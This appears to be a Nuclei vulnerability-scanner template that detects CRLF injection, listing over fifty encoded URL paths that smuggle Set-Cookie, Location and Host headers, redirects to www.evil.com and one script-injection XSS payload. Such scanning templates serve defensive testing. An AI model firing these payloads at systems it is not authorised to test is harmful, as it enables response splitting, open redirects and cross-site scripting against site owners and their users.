http:
- matchers:
  - part: header
    regex:
    - (?m)^(?:(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)www\.evil\.com\/?(\/|[^.].*)?$|(?:(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(roninja=roninja)(?:\s*?)(?:$|;)|roninja-x))
    type: regex
  - condition: or
    status:
    - 200
    - 201
    - 202
    - 204
    - 205
    - 206
    - 207
    - 301
    - 302
    - 307
    - 308
    type: status
  matchers-condition: and
  method: GET
  path:
  - "{{BaseURL}}/\r\nHost: {{Hostname}}\r\nCookie: roninja=roninja\r\n\r\nHTTP/1.1\
    \ 200 OK\r\nSet-Cookie: roninja=roninja\r\n\r\n"
  - '{{BaseURL}}/%0d%0aHost:%20{{Hostname}}%0d%0aCookie:%20roninja=roninja%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aSet-Cookie:%20roninja=roninja%0d%0a%0d%a'
  - '{{BaseURL}}//www.evil.com/%2F%2E%2E%0D%0Aroninja-x:roninja-x'
  - '{{BaseURL}}/www.evil.com/%2E%2E%2F%0D%0Aroninja-x:roninja-x'
  - '{{BaseURL}}/www.evil.com/%2F..%0D%0Aroninja-x:roninja-x'
  - '{{BaseURL}}/%3f%0d%0aLocation:%0d%0aroninja-x:roninja-x%0d%aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E'
  - '{{BaseURL}}/%0d%0ahost:%20www.evil.com'
  - '{{BaseURL}}/%0d%0ahost:%20www.evil.com%0d%0a'
  - '{{BaseURL}}/%5Cr%5Cnhost:%20www.evil.com%5Cr%5Cn'
  - '{{BaseURL}}/%0d%0aLocation:www.evil.com%0d%0a'
  - '{{BaseURL}}/%0d%0aSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%0dSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%0aSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5Cn%5CtSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5CtSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%E5%98%8A%E5%98%8DLocation:www.evil.com'
  - '{{BaseURL}}/%E5%98%8D%E5%98%8ALocation:www.evil.com'
  - '{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:roninja=roninja'
  - '{{BaseURL}}/%E5%98%8A%E5%98%8DSet-Cookie:roninja=roninja'
  - '{{BaseURL}}/%5CrSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%20Set-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5CnSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5Cn%20Set-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5CrSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%u000ASet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%20Set-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%23%0D%0ALocation:www.evil.com;'
  - '{{BaseURL}}/%5Cr%5CnSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5Cn%20Set-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5Cn%5CtSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5CtSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5cr%5cnLocation:www.evil.com'
  - '{{BaseURL}}/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5CrSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%20Set-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5CnSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5Cn%20Set-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5Cn%5CtSet-Cookie:roninja=roninja;'
  - '{{BaseURL}}/%5Cr%5CtSet-Cookie:roninja=roninja;'
  - "{{BaseURL}}/\r\nhost:%20www.evil.com\r\n"
  - "{{BaseURL}}/\r\n\tSet-Cookie:roninja=roninja;"
  - "{{BaseURL}}/\r\nSet-Cookie:roninja=roninja;"
  - "{{BaseURL}}/\r\n%20Set-Cookie:roninja=roninja;"
  - "{{BaseURL}}/\r\n\tSet-Cookie:roninja=roninja;"
  - "{{BaseURL}}/\r\tSet-Cookie:roninja=roninja;"
  - "{{BaseURL}}/\r\nLocation:www.evil.com"
  - "{{BaseURL}}/\rSet-Cookie:roninja=roninja;"
  - "{{BaseURL}}/\r%20Set-Cookie:roninja=roninja;"
  - "{{BaseURL}}/\r\nSet-Cookie:roninja=roninja;"
  - "{{BaseURL}}/\r\n%20Set-Cookie:roninja=roninja;"
  - "{{BaseURL}}/\r\n\tSet-Cookie:roninja=roninja;"
  - "{{BaseURL}}/\r\tSet-Cookie:roninja=roninja;"
  - '{{BaseURL}}/see%20below%0d%0aSet-Cookie:roninja=roninja;'
  stop-at-first-match: false
id: crlf-extended-50
info:
  author: roninja
  description: CRLF extended from Oralyzer
  metadata:
    max-request: 8
  name: CRLF Injection Detection inspired by Oralyzer
  reference:
  - https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a
  - https://github.com/r0075h3ll/Oralyzer/blob/master/core/crlf.py
  severity: low
  tags: crlf, crlf-ext, roninja-crlf, generic
